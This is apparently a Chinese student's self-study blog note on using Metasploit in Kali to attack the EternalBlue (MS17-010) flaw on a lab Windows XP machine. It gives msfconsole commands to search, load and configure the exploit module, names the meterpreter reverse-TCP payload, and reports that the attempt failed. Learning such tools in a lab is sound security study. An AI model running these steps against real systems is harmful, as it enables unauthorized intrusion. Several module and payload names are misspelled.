【web安全个人自学笔记】msf攻击永恒之蓝

目录

metasploit

kali使用msf软件的方法

msf使用法则

搜索漏洞的模块

使用模块

配置模块必选项

运行模块

实验总结


metasploit

  • 简称msf
  • msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的schellcode,并持续保持更新。
  • 可以攻击常见的操作系统,网站,应用等等。。
  • msf让复杂的漏洞攻击流程变得简单。

kali使用msf软件的方法

kali命令行中键入

sudo su

就可以切换到管理员用户。

 然后键入

msfconsole

就可以启动msf软件。

msf是软件名称,console是接口的命令行。

msf使用法则

  1. 使用模块
  2. 配置模块必选项
  3. 运行模块

搜索漏洞的模块

例如该次我们选择永恒之蓝,永恒之蓝微软定义的编号为17年第10个漏洞,即ms17_10

在msf中搜索,键入:

search ms17_010

可以查看该漏洞可以使用的模块。

使用模块

Descirption(描述):可以发现该模块是干什么的。

Name下面的exploit的意思是漏洞攻击脚本,即可以知道起到漏洞攻击的作用。

use 模块名或者use 模块编号

即使用该模块。

配置模块必选项

查看配置

show options

回车

Required下为Yes的为必选项

Payload options攻击载荷(默认攻击载荷为windows/x64/meterpreter/trverse_tcp)作用为获取目标机器的命令执行权限。

The listen address 监听地址

The listen port 监听端口

选择Windows XP系统的靶机,利用win+r 键入cmd 键入

ipconfig

查看IP地址

IP地址为192.168.233.128,即为攻击目标的IP地址。

设置目标地址,复制然后set 

set RHOSTS 192.168.233.128//192.168.233.128为本次我攻击目标的IP地址,不同的IP地址可直接更改

发现没有需要修改的配置项了。

以防攻击失败可以修改端口。

set LPORT 6666//一共有6万个端口 任意即可

运行模块

run

攻击失败,证明被攻击机器并没有该漏洞。 

实验总结

这是第一次进行漏洞攻击,虽然身为网安的学生,但是一直都是云里雾里不太了解,只是跟着实验步骤的教程按部就班的操作。这次学习,在视频的基础上加上了自己的理解,对于msf这个攻击软件的利用有了初步的了解。

希望今后的漏洞学习也像今天一样顺利haha!

倘若有不足或者错误之处,欢迎各位大佬评论区进行指点୧꒰•̀ᴗ•́꒱୨

本文链接:https://my.lmcjl.com/post/14748.html

展开阅读全文

4 评论

留下您的评论.